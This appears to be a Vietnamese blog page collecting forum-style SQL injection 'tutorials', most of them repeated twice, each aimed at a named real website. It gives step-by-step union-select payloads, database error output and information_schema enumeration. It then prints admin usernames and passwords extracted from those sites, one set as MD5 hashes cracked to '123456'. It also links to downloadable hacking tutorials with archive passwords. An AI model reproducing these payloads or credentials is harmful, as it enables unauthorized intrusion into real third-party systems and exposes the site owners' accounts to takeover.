Bài viết hot
sql order khó audiotrend.com
http://www.mediafire.com/?w8039nqewafp17h
sql-ko hiện số-lystravel.com.vn
http://www.mediafire.com/?59n683pn8p04oba
pass:mumauden
sql-html-khó thegioinghesi.com
http://www.mediafire.com/?1fz6e1cmm9n8b6z
Sql-Replace-spaadam.com
http://www.mediafire.com/?0h2dkw6cc3k2fvf
sql-406Accept-mp3hungama.com
http://www.mediafire.com/?v7ayn2wx2qs52s6
PASS:tghmmd
TUT Hack SQL by Goodboy
http://hoffmans.co.za/shopdisplayproducts.asp?id=1'
oh site này bị lỗi:"Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'ccategory = 1' Order By specialOffer DESC, cname'.
/shop$db.asp, line 831"
Hehe thêm đoạn check này vào xem nhá:
%20union%20%20select%201%20from%20tbluser%27
"Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC Microsoft Access Driver] The number of columns in the two selected tables or queries of a union query do not match.
/shop$db.asp, line 831"
Gì nữa???? Sao lạ lạ
Thêm vào code: 1%20union%20%20select%201,2%20from%20tbluser%27
tự ngồi dò,dò mỏi cả mắt bỗng hiện ra cái bảng sáng cả mắt:
link dò tới 30 khổ quá:http://hoffmans.co.za/shopdisplaypro...m%20tbluser%27
Số ta có được 3,4,21,22
Chọn số nào cũng được tui chọn tạm 3 and 21 thay nhé thay 3= " fldusername"
21=" fldpassword"
Ta có link: http://hoffmans.co.za/shopdisplaypro...m%20tbluser%27
ID và pass: Mike/sweet
Thấy tut viết chữ này hay thì thank cái , mỏi mắt mỏi lưng ùi.đi ngủ
oh site này bị lỗi:"Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'ccategory = 1' Order By specialOffer DESC, cname'.
/shop$db.asp, line 831"
Hehe thêm đoạn check này vào xem nhá:
%20union%20%20select%201%20from%20tbluser%27
"Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC Microsoft Access Driver] The number of columns in the two selected tables or queries of a union query do not match.
/shop$db.asp, line 831"
Gì nữa???? Sao lạ lạ
Thêm vào code: 1%20union%20%20select%201,2%20from%20tbluser%27
tự ngồi dò,dò mỏi cả mắt bỗng hiện ra cái bảng sáng cả mắt:
link dò tới 30 khổ quá:http://hoffmans.co.za/shopdisplaypro...m%20tbluser%27
Số ta có được 3,4,21,22
Chọn số nào cũng được tui chọn tạm 3 and 21 thay nhé thay 3= " fldusername"
21=" fldpassword"
Ta có link: http://hoffmans.co.za/shopdisplaypro...m%20tbluser%27
ID và pass: Mike/sweet
Thấy tut viết chữ này hay thì thank cái , mỏi mắt mỏi lưng ùi.đi ngủ
Link login admin trước nhé:http://sinotruk.com.vn/admin/login.asp
http://sinotruk.com.vn/news.asp?tin_ID=98
check dấu ' à dính lỗi
http://sinotruk.com.vn/news.asp?tin_ID=98'
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'tin_ID=98''.
/news.asp, line 16
bây giờ tiếp ta khai thác columns
nó sẽ ra thế này:
Microsoft OLE DB Provider for ODBC Drivers error ’80004005′ [Microsoft][ODBC Microsoft Access Driver] The number of columns in the two selected tables or queries of a union query do not match.
/tintuc.asp, line 20
union select 0,1,2,3,4,5,6 from tb_admin
à có lỗi "mày hả bưởi"
Có số 1,3,4 ta thay 3 bằng username
4= password
có link dạng: union select 0,1,2,username,password,5,6 from tb_admin
http://sinotruk.com.vn/news.asp?tin_ID=98 union select 0,1,2,username,password,5,6 from tb_admin
có được id và pass: Admin/giabao3.0
Thấy hay thì thank nha
Nguồn : HackerVN.forum.st
http://sinotruk.com.vn/news.asp?tin_ID=98
check dấu ' à dính lỗi
http://sinotruk.com.vn/news.asp?tin_ID=98'
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'tin_ID=98''.
/news.asp, line 16
bây giờ tiếp ta khai thác columns
nó sẽ ra thế này:
Microsoft OLE DB Provider for ODBC Drivers error ’80004005′ [Microsoft][ODBC Microsoft Access Driver] The number of columns in the two selected tables or queries of a union query do not match.
/tintuc.asp, line 20
union select 0,1,2,3,4,5,6 from tb_admin
à có lỗi "mày hả bưởi"
Có số 1,3,4 ta thay 3 bằng username
4= password
có link dạng: union select 0,1,2,username,password,5,6 from tb_admin
http://sinotruk.com.vn/news.asp?tin_ID=98 union select 0,1,2,username,password,5,6 from tb_admin
có được id và pass: Admin/giabao3.0
Thấy hay thì thank nha
Nguồn : HackerVN.forum.st
Site này dễ, nhưng forum hiện không có nhiều TUT nên pi cũng đú tí, ae đừng chê bai
Mã:
http://lamtruccuong.com.vn
Link lỗi:
Mã:
http://lamtruccuong.com.vn/product_d...og=2&primary=1'
Có lỗi rồi, cứ thực hiện từ từ thôi
1. Order by:
- Order by 32--
~~> lỗi
- Order by 31--
~~> OK
Vậy là có 31 table
2. Tìm vị trí lỗi
Mã:
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31-- -
Có 3 chỗ: 5, 15, 22.
Chọn 1 chỗ mà đào mỏ
3. Check version
Kiểm tra cái ver để tiện đào mỏ nhé
Mã:
union select 1,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31-- -
Quote:
5.0.67-community
Ver 5 là tốt rồi
4. Get table
Mã:
union select 1,2,3,4,group_concat(0x20,table_name),6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31 from information_schema.tables where table_schema=database() -- -
Note: thêm cái "0x20" trong group_concat() để tạo dấu cách trong kết quả, dễ nhìn và kết quả không bị che lấp (tránh trường hợp bị thiếu table)
Kết quả:
Quote:
tblAccount, tblAccount_tblFunction, tblAdCompany, tblAdvertisement, tblFunction, tbl_ads, tbl_category_company, tbl_category_company_code, tbl_category_company_sub, tbl_category_company_sub_code, tbl_contact_mail, tbl_logo, tblcontact, tblcontact_code, tbllanguage_code, tbllanguages, tblproduct, tblproduct_code, tblsupport, tbltabmenu, tbltabmenu_code, useronline
5. Get column
Mình get trong table tblAccount nhé.
Mã hex của tblAccount: 0x74626c4163636f756e74
Mã:
union select 1,2,3,4,group_concat(0x20,column_name),6,7,8,9,10, 11,12,13,14,15, 16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from information_schema.columns where table_schema=database() and table_name=0x74626c4163636f756e74-- -
Quote:
account_id, username, pwd, isActived, isLock
6. Chôm cái username và pwd
Mã:
union select 1,2,3,4,group_concat(0x20,username,0x7c,pwd),6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ,26,27,28,29,30,31 from tblAccount-- -
Và đây:
Quote:
admin|e10adc3949ba59abbe56e057f20f883e, tai|e10adc3949ba59abbe56e057f20f883e
Việc còn lại là crack md5. Ae cứ google mà đập cái đống mã kia vào
Quote:
admin|123456, tai|123456
END TUT.
http://lamtruccuong.com.vn
Link lỗi:
Mã:
http://lamtruccuong.com.vn/product_d...og=2&primary=1'
Có lỗi rồi, cứ thực hiện từ từ thôi
1. Order by:
- Order by 32--
~~> lỗi
- Order by 31--
~~> OK
Vậy là có 31 table
2. Tìm vị trí lỗi
Mã:
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31-- -
Có 3 chỗ: 5, 15, 22.
Chọn 1 chỗ mà đào mỏ
3. Check version
Kiểm tra cái ver để tiện đào mỏ nhé
Mã:
union select 1,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31-- -
Quote:
5.0.67-community
Ver 5 là tốt rồi
4. Get table
Mã:
union select 1,2,3,4,group_concat(0x20,table_name),6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31 from information_schema.tables where table_schema=database() -- -
Note: thêm cái "0x20" trong group_concat() để tạo dấu cách trong kết quả, dễ nhìn và kết quả không bị che lấp (tránh trường hợp bị thiếu table)
Kết quả:
Quote:
tblAccount, tblAccount_tblFunction, tblAdCompany, tblAdvertisement, tblFunction, tbl_ads, tbl_category_company, tbl_category_company_code, tbl_category_company_sub, tbl_category_company_sub_code, tbl_contact_mail, tbl_logo, tblcontact, tblcontact_code, tbllanguage_code, tbllanguages, tblproduct, tblproduct_code, tblsupport, tbltabmenu, tbltabmenu_code, useronline
5. Get column
Mình get trong table tblAccount nhé.
Mã hex của tblAccount: 0x74626c4163636f756e74
Mã:
union select 1,2,3,4,group_concat(0x20,column_name),6,7,8,9,10, 11,12,13,14,15, 16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from information_schema.columns where table_schema=database() and table_name=0x74626c4163636f756e74-- -
Quote:
account_id, username, pwd, isActived, isLock
6. Chôm cái username và pwd
Mã:
union select 1,2,3,4,group_concat(0x20,username,0x7c,pwd),6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ,26,27,28,29,30,31 from tblAccount-- -
Và đây:
Quote:
admin|e10adc3949ba59abbe56e057f20f883e, tai|e10adc3949ba59abbe56e057f20f883e
Việc còn lại là crack md5. Ae cứ google mà đập cái đống mã kia vào
Quote:
admin|123456, tai|123456
END TUT.
TAG:
SQL Injection,
Tin mới cập nhật
Copyright 2011 - 2012 CLOVER NEWS
Nội dung trên được chúng tôi tổng hợp từ nhiều nguồn trên internet.
Thông tin mã nguồnCLOVER NEWS
Website sử dụng mã nguồn XML Blogger
Code XML by: Nguyễn Mạnh Đạt (DNMsuper)
Email: datnguyen1297@gmail.com
Y!M: dnmsuper
Liên hệ quảng cáo:
Email: datnguyen1297@gmail.com
Y!M: dnmsuper